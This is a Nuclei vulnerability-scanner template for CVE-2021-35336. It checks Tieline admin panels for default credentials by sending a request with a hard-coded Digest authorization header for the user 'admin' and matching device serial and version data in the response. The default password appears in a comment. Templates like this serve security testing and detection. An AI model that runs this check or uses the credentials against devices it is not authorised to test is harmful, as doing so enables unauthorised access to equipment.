nuclei-templates/cves/2021/CVE-2021-35336.yaml

40 lines
1.2 KiB
YAML
Raw Blame History

This file contains ambiguous Unicode characters!

This file contains ambiguous Unicode characters that may be confused with others in your current locale. If your use case is intentional and legitimate, you can safely ignore this warning. Use the Escape button to highlight these characters.

id: CVE-202135336
info:
name: Unauthorised Remote Access of Internal Panel
author: Pratik Khalane
severity: critical
description: Finding the Tieline Admin Panels with default credentials.
reference:
- https://pratikkhalane91.medium.com/use-of-default-credentials-to-unauthorised-remote-access-of-internal-panel-of-tieline-c1ffe3b3757c
- https://nvd.nist.gov/vuln/detail/CVE-2021-35336
tags: cve,cve2021,tieline,default-login
# admin:password
requests:
- method: GET
path:
- '{{BaseURL}}/api/get_device_details'
headers:
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:89.0) Gecko/20100101 Firefox/89.0
Referer: '{{BaseURL}}/assets/base/home.html'
Authorization: 'Digest username="admin", realm="Bridge-IT", nonce="d24d09512ebc3e43c4f6faf34fdb8c76", uri="/api/get_device_details", response="d052e9299debc7bd9cb8adef0a83fed4", qop=auth, nc=00000001, cnonce="ae373d748855243d"'
matchers-condition: and
matchers:
- type: word
words:
- "<SERIAL>"
- "<VERSION>"
condition: and
- type: word
words:
- "text/xml"
part: header
- type: status
status:
- 200